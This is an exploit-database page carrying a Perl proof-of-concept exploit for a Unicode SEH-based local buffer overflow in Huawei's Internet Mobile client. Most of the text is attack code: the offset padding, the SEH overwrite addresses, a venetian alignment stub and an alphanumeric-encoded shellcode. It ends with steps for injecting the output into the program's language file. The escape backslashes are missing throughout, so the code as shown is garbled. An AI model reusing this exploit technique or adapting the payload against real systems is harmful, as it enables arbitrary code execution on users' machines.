[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Huawei Technologies Internet Mobile Unicode SEH Exploit
# Published : 2012-10-15
# Author :
# Previous Title : Windows AlwaysInstallElevated MSI
# Next Title : mcrypt <= 2.5.8 Stack Based Overflow
#!/usr/bin/perl
# Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
####################################################################################
# Vulnerable : Etisalat , Vodafone , Meditel , Maroc Telecom , Royal KPN , Cell C , STC ...
####################################################################################
# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH Based Vulnerability .
# Author : Dark-Puzzle
# Versions : All Versions Are Vulnerable , The behavior of the program when exploiting may vary from an OS to another OS .
# RISK : Critical .
# Type : Local .
######################################################
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
#####################################################
#---------------------------------------------------------------------
# Use it at your own risk #
###---------------------------------------------------------------------
# Info : This exploit works only on WinXP SP1 because it is almost impossible to execute it on Win7 & WinXP SP2/SP3 cause This program has been compiled with SafeSEH enabled .
# So in other versions of Windows you will not find any valid UNICODE addresses (No SafeSEH) neither in OS modules nor in Program Modules .
# Anyway this exploit works perfectly on Windows XP SP1 .
# Here it is , the video explain the usage =) : http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
###
# So first go to C:program filesInternet MobilepluginsSMSUIPluginSMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language)
# Then put the output of this perl program in <item name="IDS_PLUGIN_NAME">HERE !!</item> . Save it open the program .
# Not like Win7 & WinXP SP2/SP3 this exploit requires you to click from the to menu "Operation" --> "Message texte" !! Bingo . Calc.exe Just Showed Up =) .
# English :"Operation" --> "Text Message"
my $size = 43680;
my $junk = "A" x 146 ;
my $nseh = "x61x62"; # Popad + Align .
my $seh = "x88xDC"; # p/p/r From OLE32.DLL ( Windows XP SP1 Only)
# The Venetian Shellcode :
my $ven =
"x6e". # Align Code
"x53". # push ebx
"x6e". # Align Code
"x58". # pop eax
"x6e". # Align Code
"x05x17x11". # add eax, 0x11001700
"x6e". # Align Code
"x2dx16x11". # sub eax, 0x11001600
"x6e". # Align Code
"x50". # push eax
"x6e". # Align Code
"xc3"; # ret
my $more = "D" x 108 ; # Exact Value To Make the Venetian shellcode work.
# CALC.exe Shellcode .
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";
my $morestuff = "D" x ( 43680 - length($junk.$nseh.$seh));
$payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;
open (myfile,'>mobile.txt');
print myfile $payload;
close(myfile);
print "Huawei Technologies Unicode SEH Based Overflown";
print "x44x69x73x63x6Fx76x65x72x65x64x20x26x20x50x6Fx43x20x42x79x20x44x61x72x6Bx2Dx50x75x7Ax7Ax6Cx65n";
print "Creating Input Please Be Patientn";
sleep 5;